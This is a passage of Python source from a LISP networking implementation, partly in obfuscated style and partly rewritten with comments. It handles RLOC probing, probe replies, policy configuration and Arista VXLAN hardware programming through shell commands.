     OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
     lisp_install_host_route ( oo0o00OO , IiI1Ii , True )
     ooooOOO0OoO = ", send on nh {}({})" . format ( IiI1Ii , OooOOOoOoo0O0 )
    if 47 - 47: I1IiiI + Oo0Ooo
    if 78 - 78: i1IIi / I1ii11iIi11i % ooOoO0o * OoO0O00
    if 10 - 10: i1IIi % ooOoO0o / iII111i
    if 98 - 98: IiII / o0oOOo0O0Ooo - i1IIi - OOooOOo
    if 65 - 65: Ii1I + OoOoOO00 * Oo0Ooo . O0 . IiII
    # Log the probe being sent, with port, rloc-name and last RTT.
    i1i1I1I1 = oOo00O . print_rloc_probe_rtt ( )
    IiiIII1IIiI1iii = oo0o00OO
    if ( oOo00O . translated_port != 0 ) :
     IiiIII1IIiI1iii += ":{}" . format ( oOo00O . translated_port )
    if 19 - 19: iII111i + OOooOOo
    IiiIII1IIiI1iii = red ( IiiIII1IIiI1iii , False )
    if ( oOo00O . rloc_name != None ) :
     IiiIII1IIiI1iii += " (" + blue ( oOo00O . rloc_name , False ) + ")"
    if 65 - 65: I1ii11iIi11i . OoooooooOO + Oo0Ooo * Ii1I
    lprint ( "Send {}{} {}, last rtt: {}{}" . format ( OOO0oOooOOo00 , o0O0o00ooOOOO0 ,
     IiiIII1IIiI1iii , i1i1I1I1 , ooooOOO0OoO ) )
    if 27 - 27: Oo0Ooo % i11iIiiIii
    if 48 - 48: IiII
    if 74 - 74: Oo0Ooo
    if 75 - 75: IiII + OOooOOo
    if 92 - 92: OoOoOO00
    if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
    if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
    if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
    # Remember the pre-existing host-route next-hop so it can be
    # restored after the probe is sent.
    if ( oOo00O . rloc_next_hop != None ) :
     iiIIII1I1ii = lisp_get_host_route_next_hop ( oo0o00OO )
     if ( iiIIII1I1ii ) : lisp_install_host_route ( oo0o00OO , iiIIII1I1ii , False )
    if 11 - 11: I1ii11iIi11i . I1Ii111 / o0oOOo0O0Ooo + IiII
    if 73 - 73: OoO0O00 . i11iIiiIii * OoO0O00 * i1IIi + I11i
    if 27 - 27: i11iIiiIii / OoOoOO00 % O0 / II111iiii . I11i - ooOoO0o
    if 54 - 54: oO0o * II111iiii
    if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
    if 98 - 98: ooOoO0o
    # A chained RLOC may have no address yet; copy the parent's.
    if ( oOo00O . rloc . is_null ( ) ) :
     oOo00O . rloc . copy_address ( i1iI1Iii . rloc )
    if 73 - 73: I1Ii111
    if 97 - 97: OoO0O00 * Ii1I + Oo0Ooo
    if 83 - 83: II111iiii - Oo0Ooo % II111iiii * o0oOOo0O0Ooo
    if 51 - 51: iII111i * iIii1I11I1II1 % Ii1I * Ii1I + i11iIiiIii . OoooooooOO
    if 54 - 54: i11iIiiIii . iIii1I11I1II1 * iIii1I11I1II1 + Ii1I % I11i - OoO0O00
    # Send the RLOC-probe Map-Request. For (S,G) entries, the group
    # is the destination EID and the source EID rides along.
    O00oOOOOoOO = None if ( O0o00oOOOO00 . is_null ( ) ) else OOo0O0O0o0
    I11iIii1i11 = OOo0O0O0o0 if ( O0o00oOOOO00 . is_null ( ) ) else O0o00oOOOO00
    lisp_send_map_request ( lisp_sockets , 0 , O00oOOOOoOO , I11iIii1i11 , oOo00O )
    O0O00OOoo00 = i1iI1Iii
    if 67 - 67: OoO0O00
    if 37 - 37: o0oOOo0O0Ooo + I11i - Ii1I - Ii1I * OoO0O00 % i11iIiiIii
    if 98 - 98: I1Ii111 % IiII % i1IIi * OOooOOo . iIii1I11I1II1
    if 60 - 60: iII111i . Ii1I / I1IiiI
    # Remove the temporary host route installed for this probe.
    if ( IiI1Ii ) : lisp_install_host_route ( oo0o00OO , IiI1Ii , False )
   if 92 - 92: OoooooooOO % II111iiii + I1ii11iIi11i
   if 93 - 93: OoooooooOO . I1ii11iIi11i
   if 100 - 100: iIii1I11I1II1 . i1IIi / OOooOOo * i11iIiiIii
   if 93 - 93: I1ii11iIi11i
   if 45 - 45: I1ii11iIi11i * I1ii11iIi11i
   # Reinstall the host route that existed before probing.
   if ( iiIIII1I1ii ) : lisp_install_host_route ( oo0o00OO , iiIIII1I1ii , True )
   if 31 - 31: OoO0O00 - OOooOOo . iII111i * I1Ii111 * iII111i + I1ii11iIi11i
   if 5 - 5: Oo0Ooo . I1Ii111
   if 77 - 77: i11iIiiIii / I1Ii111 / I1ii11iIi11i % oO0o
   if 83 - 83: Ii1I % iIii1I11I1II1 / I1ii11iIi11i + I11i
   # Pacing: sleep 20 ms after every 10th probe.
   OO += 1
   if ( ( OO % 10 ) == 0 ) : time . sleep ( 0.020 )
 if 23 - 23: iIii1I11I1II1 - I1IiiI
 if 51 - 51: OoooooooOO / IiII / I1ii11iIi11i . Oo0Ooo - o0oOOo0O0Ooo * OoooooooOO
 if 40 - 40: OoO0O00 / IiII . O0 / I1IiiI + OoO0O00 . o0oOOo0O0Ooo
 lprint ( "---------- End RLOC Probing ----------" )
 return
if 25 - 25: ooOoO0o * I1Ii111 * oO0o
if 64 - 64: Ii1I / I1ii11iIi11i
if 30 - 30: OoooooooOO + O0 / I1ii11iIi11i * o0oOOo0O0Ooo
if 11 - 11: O0 + OoO0O00 - Oo0Ooo - Oo0Ooo . i11iIiiIii
if 15 - 15: Ii1I % i11iIiiIii / OoOoOO00
if 85 - 85: ooOoO0o . i1IIi / iII111i % iIii1I11I1II1 / II111iiii / I1Ii111
if 60 - 60: iIii1I11I1II1 - iIii1I11I1II1 . I11i
if 55 - 55: OoO0O00
def lisp_update_rtr_updown ( rtr , updown ) :
    """
    Tell the lisp-etr process (via IPC) that RTR 'rtr' transitioned up or
    down.  Only runs in an ITR, and only when we register RTRs selectively
    (when lisp_register_all_rtrs is set, reachability doesn't matter).
    """
    global lisp_ipc_socket

    #
    # Only the ITR tracks per-RTR up/down state.
    #
    if ( lisp_i_am_itr == False ) : return

    #
    # Registering all RTRs regardless of state - nothing to report.
    #
    if ( lisp_register_all_rtrs ) : return

    rtr_str = rtr . print_address_no_iid ( )

    #
    # Unknown RTR - ignore.
    #
    if ( ( rtr_str in lisp_rtr_list ) == False ) : return

    updown = "up" if updown else "down"
    lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
        red ( rtr_str , False ) , bold ( updown , False ) ) )

    #
    # Build "rtr%<address>%<up|down>" IPC message and send it.
    #
    ipc = "rtr%{}%{}" . format ( rtr_str , updown )
    ipc = lisp_command_ipc ( ipc , "lisp-itr" )
    lisp_ipc ( ipc , lisp_ipc_socket , "lisp-etr" )
    return
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
def lisp_process_rloc_probe_reply ( rloc , source , port , nonce , hop_count , ttl ) :
    """
    Dispatch a received RLOC-probe reply to every RLOC registered in
    lisp_rloc_probe_list under a matching key.  The key is tried as the
    reply's RLOC address, then RLOC:port, then the packet's outer source
    address; if all three miss, the reply is logged as unsolicited.
    """
    probe = bold ( "RLOC-probe reply" , False )
    rloc_str = rloc . print_address_no_iid ( )
    source_str = source . print_address_no_iid ( )
    plist = lisp_rloc_probe_list

    #
    # Try lookup keys in order of preference.
    #
    addr_str = rloc_str
    if ( ( addr_str in plist ) == False ) :
        addr_str += ":" + str ( port )
        if ( ( addr_str in plist ) == False ) :
            addr_str = source_str
            if ( ( addr_str in plist ) == False ) :
                addr_str += ":" + str ( port )
                lprint ( "  Received unsolicited {} from {}/{}, port {}" . format ( probe , red ( rloc_str , False ) , red ( source_str ,
                    False ) , port ) )
                return

    #
    # Deliver the reply to each (rloc, eid, group) entry stored under the
    # matched key.  In an RTR, only match entries whose stored NAT-translated
    # port agrees with the reply's source port (0 means untranslated).
    #
    for entry_rloc , eid , group in lisp_rloc_probe_list [ addr_str ] :
        if ( lisp_i_am_rtr and entry_rloc . translated_port != 0 and
            entry_rloc . translated_port != port ) : continue
        entry_rloc . process_rloc_probe_reply ( nonce , eid , group , hop_count , ttl )
    return
if 3 - 3: I1IiiI + I1ii11iIi11i - I11i
if 15 - 15: OoOoOO00 . Oo0Ooo / ooOoO0o + Oo0Ooo - OoooooooOO - o0oOOo0O0Ooo
if 64 - 64: OOooOOo
if 44 - 44: O0 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii . OoOoOO00
if 32 - 32: I1ii11iIi11i - iII111i
if 34 - 34: OOooOOo . i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1ii11iIi11i
if 32 - 32: i11iIiiIii . I1Ii111
if 38 - 38: O0
def lisp_db_list_length ( ) :
    """
    Return the effective number of database-mapping entries.  A database
    entry configured for dynamic-EIDs counts once per discovered dynamic
    EID; otherwise it counts as one.  Each entry additionally contributes
    one count per element of its EID's iid-list.
    """
    total = 0
    for db in lisp_db_list :
        if ( db . dynamic_eid_configured ( ) ) :
            total += len ( db . dynamic_eids )
        else :
            total += 1
        total += len ( db . eid . iid_list )
    return ( total )
if 6 - 6: OoO0O00 . o0oOOo0O0Ooo / Ii1I + Ii1I
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
def lisp_is_myeid ( eid ) :
    """
    Return True when 'eid' falls within (is more specific than or equal
    to) any configured database-mapping EID-prefix, False otherwise.
    """
    return ( any ( eid . is_more_specific ( db . eid ) for db in lisp_db_list ) )
if 55 - 55: IiII / ooOoO0o * I1IiiI / I1Ii111 - Oo0Ooo % o0oOOo0O0Ooo
if 82 - 82: OoO0O00 - iIii1I11I1II1 . Oo0Ooo / IiII . OoO0O00
if 47 - 47: OOooOOo + IiII
if 11 - 11: Oo0Ooo + I1IiiI % i11iIiiIii % Oo0Ooo + ooOoO0o + i1IIi
if 100 - 100: II111iiii - OOooOOo + iII111i - i11iIiiIii . O0 / iII111i
if 64 - 64: Ii1I
if 4 - 4: OoOoOO00
if 78 - 78: i1IIi - iII111i + O0 - I1IiiI % o0oOOo0O0Ooo
if 48 - 48: iII111i / II111iiii * I1Ii111 + I11i / ooOoO0o . OoOoOO00
def lisp_format_macs ( sa , da ) :
    """
    Format two 12-hex-character MAC strings as dash-separated 4-digit
    groups, e.g. "0011-2233-4455 -> aabb-ccdd-eeff".
    """
    def _dash ( mac ) :
        # Split into three 4-character groups joined by dashes.
        return ( "-" . join ( [ mac [ 0 : 4 ] , mac [ 4 : 8 ] , mac [ 8 : 12 ] ] ) )
    return ( "{} -> {}" . format ( _dash ( sa ) , _dash ( da ) ) )
if 45 - 45: OOooOOo / Ii1I % O0
if 7 - 7: oO0o * i11iIiiIii + OoooooooOO + I11i
if 9 - 9: II111iiii * Oo0Ooo * I1Ii111 . IiII
if 80 - 80: i11iIiiIii . i11iIiiIii . i11iIiiIii . OoooooooOO - OOooOOo * OoooooooOO
if 96 - 96: oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
def lisp_get_echo_nonce ( rloc , rloc_str ) :
    """
    Return the nonce-echo state stored for an RLOC, or None when
    nonce-echoing is disabled or no state exists.  When 'rloc' is
    supplied its printed address overrides 'rloc_str'.
    """
    if ( lisp_nonce_echoing == False ) : return ( None )

    if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )

    # dict.get() returns None on a miss, matching the original default.
    return ( lisp_nonce_echo_list . get ( rloc_str , None ) )
if 93 - 93: i1IIi * i11iIiiIii % OoOoOO00 % iII111i
if 31 - 31: OoO0O00
if 89 - 89: II111iiii
if 33 - 33: OOooOOo / oO0o % OoOoOO00 * O0
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
if 33 - 33: O0
if 30 - 30: II111iiii . O0 . oO0o * I1ii11iIi11i + oO0o . o0oOOo0O0Ooo
def lisp_decode_dist_name ( packet ) :
    """
    Pull a null-terminated distinguished-name string off the front of
    'packet'.  Returns (remaining-packet, name) on success, or the list
    [None, None] when no terminator appears within the first 255 bytes
    (same sentinel the original byte-by-byte loop produced).
    """
    idx = packet . find ( "\0" )
    if ( idx == - 1 or idx > 255 ) : return ( [ None , None ] )
    return ( packet [ idx + 1 : : ] , packet [ : idx ] )
if 59 - 59: OOooOOo - o0oOOo0O0Ooo
if 82 - 82: IiII % ooOoO0o - OoO0O00 % ooOoO0o
if 51 - 51: ooOoO0o % iII111i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 20 - 20: i1IIi - ooOoO0o % OoooooooOO * I1ii11iIi11i + II111iiii % i1IIi
if 30 - 30: i11iIiiIii - I1IiiI + o0oOOo0O0Ooo + IiII
if 16 - 16: I1ii11iIi11i / Ii1I + I1ii11iIi11i * I1Ii111
if 49 - 49: ooOoO0o * OoOoOO00 . OoooooooOO . ooOoO0o + Oo0Ooo * IiII
if 47 - 47: iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
def lisp_write_flow_log ( flow_log ) :
    """
    Append every buffered flow entry to ./logs/lisp-flow.log and log how
    many were written.  Each entry is indexed [0..3] where entry[3] is a
    packet-like object whose print_flow() formats the line from the
    first three fields.
    """
    count = 0
    log_file = open ( "./logs/lisp-flow.log" , "a" )
    for entry in flow_log :
        pkt = entry [ 3 ]
        log_file . write ( pkt . print_flow ( entry [ 0 ] , entry [ 1 ] , entry [ 2 ] ) )
        count += 1
    log_file . close ( )
    del ( flow_log )

    count = bold ( str ( count ) , False )
    lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( count ) )
    return
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if 66 - 66: OoooooooOO
if 90 - 90: IiII - OoOoOO00
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
if 37 - 37: iII111i - Ii1I . oO0o
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
#
# Map "lisp policy" match keywords that simply copy their string value into
# a lisp_policy_match attribute.
#
_lisp_policy_name_attr = {
    "rloc-record-name" : "rloc_record_name" ,
    "geo-name" : "geo_name" ,
    "elp-name" : "elp_name" ,
    "rle-name" : "rle_name" ,
    "json-name" : "json_name" ,
}

def _lisp_policy_each ( matches , values ) :
    #
    # Pair each match clause with its per-clause configured value, skipping
    # clauses whose value is the empty string (unconfigured).
    #
    for i in range ( len ( matches ) ) :
        if ( values [ i ] == "" ) : continue
        yield ( matches [ i ] , values [ i ] )

def lisp_policy_command ( kv_pair ) :
    """
    Process a "lisp policy" configuration command.  kv_pair maps each
    clause keyword to either a per-match-clause list of values (one slot
    per configured match clause) or a single scalar for the "set-*" and
    "policy-name" clauses.  Builds a lisp_policy with one
    lisp_policy_match per "datetime-range" slot and saves it.
    """
    policy = lisp_policy ( "" )
    set_iid = None

    #
    # One match clause per configured clause slot.  The "datetime-range"
    # list is used only for its length here.
    #
    matches = [ ]
    for i in range ( len ( kv_pair [ "datetime-range" ] ) ) :
        matches . append ( lisp_policy_match ( ) )

    for kw in kv_pair . keys ( ) :
        value = kv_pair [ kw ]

        #
        # instance-id applies to both source and destination EIDs of each
        # match clause, creating the addresses when not yet present.
        #
        if ( kw == "instance-id" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                if ( match . source_eid == None ) :
                    match . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                if ( match . dest_eid == None ) :
                    match . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                match . source_eid . instance_id = int ( v )
                match . dest_eid . instance_id = int ( v )

        #
        # source/destination EID prefixes preserve an instance-id set by a
        # previous "instance-id" clause across store_prefix().
        #
        if ( kw == "source-eid" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                if ( match . source_eid == None ) :
                    match . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                iid = match . source_eid . instance_id
                match . source_eid . store_prefix ( v )
                match . source_eid . instance_id = iid

        if ( kw == "destination-eid" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                if ( match . dest_eid == None ) :
                    match . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                iid = match . dest_eid . instance_id
                match . dest_eid . store_prefix ( v )
                match . dest_eid . instance_id = iid

        if ( kw == "source-rloc" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                match . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                match . source_rloc . store_prefix ( v )

        if ( kw == "destination-rloc" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                match . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
                match . dest_rloc . store_prefix ( v )

        #
        # Simple string-valued per-clause attributes share one table-driven
        # handler (was nine copy-pasted loops).
        #
        if ( kw in _lisp_policy_name_attr ) :
            attr = _lisp_policy_name_attr [ kw ]
            for match , v in _lisp_policy_each ( matches , value ) :
                setattr ( match , attr , v )

        #
        # Value is two concatenated 19-character datetimes (lower, upper) --
        # presumably "YYYY-MM-DD-HH:MM:SS" pairs; stored only when both parse.
        #
        if ( kw == "datetime-range" ) :
            for match , v in _lisp_policy_each ( matches , value ) :
                lower = lisp_datetime ( v [ 0 : 19 ] )
                upper = lisp_datetime ( v [ 19 : : ] )
                if ( lower . valid_datetime ( ) and upper . valid_datetime ( ) ) :
                    match . datetime_lower = lower
                    match . datetime_upper = upper

        #
        # Scalar "set-*" action clauses apply to the policy itself.
        #
        if ( kw == "set-action" ) :
            policy . set_action = value

        if ( kw == "set-record-ttl" ) :
            policy . set_record_ttl = int ( value )

        if ( kw == "set-instance-id" ) :
            if ( policy . set_source_eid == None ) :
                policy . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
            if ( policy . set_dest_eid == None ) :
                policy . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
            set_iid = int ( value )
            policy . set_source_eid . instance_id = set_iid
            policy . set_dest_eid . instance_id = set_iid

        if ( kw == "set-source-eid" ) :
            if ( policy . set_source_eid == None ) :
                policy . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
            policy . set_source_eid . store_prefix ( value )
            if ( set_iid != None ) : policy . set_source_eid . instance_id = set_iid

        if ( kw == "set-destination-eid" ) :
            if ( policy . set_dest_eid == None ) :
                policy . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
            policy . set_dest_eid . store_prefix ( value )
            if ( set_iid != None ) : policy . set_dest_eid . instance_id = set_iid

        if ( kw == "set-rloc-address" ) :
            policy . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
            policy . set_rloc_address . store_address ( value )

        if ( kw == "set-rloc-record-name" ) :
            policy . set_rloc_record_name = value

        if ( kw == "set-elp-name" ) :
            policy . set_elp_name = value

        if ( kw == "set-geo-name" ) :
            policy . set_geo_name = value

        if ( kw == "set-rle-name" ) :
            policy . set_rle_name = value

        if ( kw == "set-json-name" ) :
            policy . set_json_name = value

        if ( kw == "policy-name" ) :
            policy . policy_name = value

    #
    # Store match clauses and save the policy.
    #
    policy . match_clauses = matches
    policy . save_policy ( )
    return
if 24 - 24: ooOoO0o . i1IIi - O0 + I11i
if 71 - 71: OoOoOO00
#
# Command-dispatch table for the "lisp policy" command: maps the command
# name to its handler (lisp_policy_command) plus one descriptor per clause
# keyword.  NOTE(review): descriptor shape appears to be [takes-value] for
# text clauses, [takes-value, min, max] for bounded integers, and
# [False, <choice>, <choice>] for enumerations -- confirm against the
# command parser that consumes this table.
#
lisp_policy_commands = {
    "lisp policy" : [ lisp_policy_command , {
        "policy-name" : [ True ] ,
        "match" : [ ] ,
        "instance-id" : [ True , 0 , 0xffffffff ] ,
        "source-eid" : [ True ] ,
        "destination-eid" : [ True ] ,
        "source-rloc" : [ True ] ,
        "destination-rloc" : [ True ] ,
        "rloc-record-name" : [ True ] ,
        "elp-name" : [ True ] ,
        "geo-name" : [ True ] ,
        "rle-name" : [ True ] ,
        "json-name" : [ True ] ,
        "datetime-range" : [ True ] ,
        "set-action" : [ False , "process" , "drop" ] ,
        "set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
        "set-instance-id" : [ True , 0 , 0xffffffff ] ,
        "set-source-eid" : [ True ] ,
        "set-destination-eid" : [ True ] ,
        "set-rloc-address" : [ True ] ,
        "set-rloc-record-name" : [ True ] ,
        "set-elp-name" : [ True ] ,
        "set-geo-name" : [ True ] ,
        "set-rle-name" : [ True ] ,
        "set-json-name" : [ True ] } ]
}
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
def lisp_send_to_arista ( command , interface ) :
    """
    Push one EOS CLI configuration command to Arista hardware via FastCli,
    optionally scoped under "interface <name>" config mode.
    """
    interface = "" if ( interface == None ) else "interface " + interface

    display = command
    if ( interface != "" ) : display = interface + ": " + display
    lprint ( "Send CLI command '{}' to hardware" . format ( display ) )

    cli = '''
 enable
 configure
 {}
 {}
 ''' . format ( interface , command )
    os . system ( "FastCli -c '{}'" . format ( cli ) )
    return
if 81 - 81: I11i . II111iiii / OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
def lisp_arista_is_alive ( prefix ) :
    """
    Ask Arista hardware (via FastCli) whether 'prefix' is programmed in
    the Trident L3 software route table.  Returns True when the last
    column of the route row is "Y".
    """
    cli = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
    output = commands . getoutput ( "FastCli -c '{}'" . format ( cli ) )

    #
    # The second output line holds the route row; its last
    # whitespace-separated column (CR stripped) is the liveness flag.
    #
    row = output . split ( "\n" ) [ 1 ]
    flag = row . split ( " " ) [ - 1 ] . replace ( "\r" , "" )
    return ( flag == "Y" )
if 7 - 7: ooOoO0o + I1ii11iIi11i % OoO0O00
if 45 - 45: i1IIi / o0oOOo0O0Ooo / iII111i * OoOoOO00 . IiII
if 60 - 60: o0oOOo0O0Ooo
if 63 - 63: i11iIiiIii * Oo0Ooo * I1Ii111
if 56 - 56: I1Ii111 . i11iIiiIii
if 76 - 76: II111iiii / ooOoO0o * i11iIiiIii . O0 / O0 - i11iIiiIii
if 89 - 89: o0oOOo0O0Ooo . I1Ii111 * I11i + oO0o - OoooooooOO + OoO0O00
if 25 - 25: i1IIi * I1Ii111 * iII111i . OoooooooOO
if 70 - 70: iIii1I11I1II1
if 1 - 1: II111iiii . I1IiiI + o0oOOo0O0Ooo
if 5 - 5: I1ii11iIi11i % I11i - II111iiii
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
if 73 - 73: I1ii11iIi11i . oO0o % I11i . I1ii11iIi11i / I1Ii111 / II111iiii
if 23 - 23: OoooooooOO . o0oOOo0O0Ooo
if 76 - 76: I1Ii111
if 91 - 91: iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
if 85 - 85: II111iiii + I1ii11iIi11i
if 33 - 33: iII111i
if 14 - 14: O0 * Oo0Ooo / i1IIi
if 95 - 95: O0 % i1IIi % ooOoO0o % oO0o - I1IiiI
if 78 - 78: II111iiii % OOooOOo
if 6 - 6: OOooOOo
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
if 59 - 59: OoOoOO00
if 96 - 96: I1IiiI
if 3 - 3: OoooooooOO
if 3 - 3: IiII / O0 * i11iIiiIii . iII111i - iIii1I11I1II1
if 56 - 56: ooOoO0o
if 82 - 82: ooOoO0o . IiII . I1Ii111 - iIii1I11I1II1 + II111iiii . OoOoOO00
if 59 - 59: Oo0Ooo
if 98 - 98: I1Ii111 * II111iiii / Oo0Ooo . Oo0Ooo % I1Ii111
if 52 - 52: OoOoOO00
if 59 - 59: ooOoO0o / OoooooooOO
if 71 - 71: OOooOOo + I11i * O0 / o0oOOo0O0Ooo + I1IiiI + Ii1I
if 41 - 41: ooOoO0o * I1Ii111
if 40 - 40: OoOoOO00
if 60 - 60: IiII . i11iIiiIii * II111iiii . Ii1I
if 10 - 10: O0
if 65 - 65: I11i % i11iIiiIii + i11iIiiIii % II111iiii
if 95 - 95: I1Ii111 - I11i . II111iiii . i1IIi / II111iiii + Oo0Ooo
def lisp_program_vxlan_hardware ( mc ) :
    """
    Program an Arista switch so a map-cache entry's EID-prefix is routed
    through a VXLAN tunnel to the entry's best RLOC: allocate a next-hop
    address on vlan4094, install a static ARP entry whose MAC encodes the
    RLOC, point a static MAC table entry at the VXLAN VTEP, then add the
    kernel route.  No-op unless running on lispers.net Arista hardware.
    """
    if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return

    #
    # Need at least one RLOC to program toward.
    #
    if ( len ( mc . best_rloc_set ) == 0 ) : return

    eid_prefix = mc . eid . print_prefix_no_iid ( )
    rloc_addr = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )

    #
    # Already programmed?
    #
    route = commands . getoutput ( "ip route get {} | egrep vlan4094" . format ( eid_prefix ) )
    if ( route != "" ) :
        lprint ( "Route {} already in hardware: '{}'" . format ( green ( eid_prefix , False ) , route ) )
        return

    #
    # Sanity-check that the vxlan and vlan4094 interfaces exist and that
    # vlan4094 has an IP address to allocate next-hops from.
    #
    interfaces = commands . getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
    if ( interfaces . find ( "vxlan" ) == - 1 ) :
        lprint ( "No VXLAN interface found, cannot program hardware" )
        return
    if ( interfaces . find ( "vlan4094" ) == - 1 ) :
        lprint ( "No vlan4094 interface found, cannot program hardware" )
        return

    my_addr = commands . getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
    if ( my_addr == "" ) :
        lprint ( "No IP address found on vlan4094, cannot program hardware" )
        return
    my_addr = my_addr . split ( "inet " ) [ 1 ]
    my_addr = my_addr . split ( "/" ) [ 0 ]

    #
    # Collect vlan4094 ARP entries marked "(incomplete)" -- these
    # addresses are excluded from next-hop allocation below.
    #
    used = [ ]
    for arp_line in commands . getoutput ( "arp -i vlan4094" ) . split ( "\n" ) :
        if ( arp_line . find ( "vlan4094" ) == - 1 ) : continue
        if ( arp_line . find ( "(incomplete)" ) == - 1 ) : continue
        used . append ( arp_line . split ( " " ) [ 0 ] )

    #
    # Allocate the first .1-.254 address in our /24 that is neither in the
    # excluded list nor our own address.
    #
    next_hop = None
    octets = my_addr . split ( "." )
    for host in range ( 1 , 255 ) :
        octets [ 3 ] = str ( host )
        candidate = "." . join ( octets )
        if ( candidate in used ) : continue
        if ( candidate == my_addr ) : continue
        next_hop = candidate
        break

    if ( next_hop == None ) :
        lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
        return

    #
    # Build a MAC from the RLOC's last three dotted-quad fields and install
    # a static ARP entry for the allocated next-hop.
    #
    fields = rloc_addr . split ( "." )
    b1 = lisp_hex_string ( fields [ 1 ] ) . zfill ( 2 )
    b2 = lisp_hex_string ( fields [ 2 ] ) . zfill ( 2 )
    b3 = lisp_hex_string ( fields [ 3 ] ) . zfill ( 2 )
    mac = "00:00:00:{}:{}:{}" . format ( b1 , b2 , b3 )
    mac_dotted = "0000.00{}.{}{}" . format ( b1 , b2 , b3 )
    arp_command = "arp -i vlan4094 -s {} {}" . format ( next_hop , mac )
    os . system ( arp_command )

    #
    # Point that MAC at the VXLAN VTEP (the RLOC) in the EOS MAC table.
    #
    mac_command = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( mac_dotted , rloc_addr )
    lisp_send_to_arista ( mac_command , None )

    #
    # Finally, route the EID-prefix via the allocated next-hop.
    #
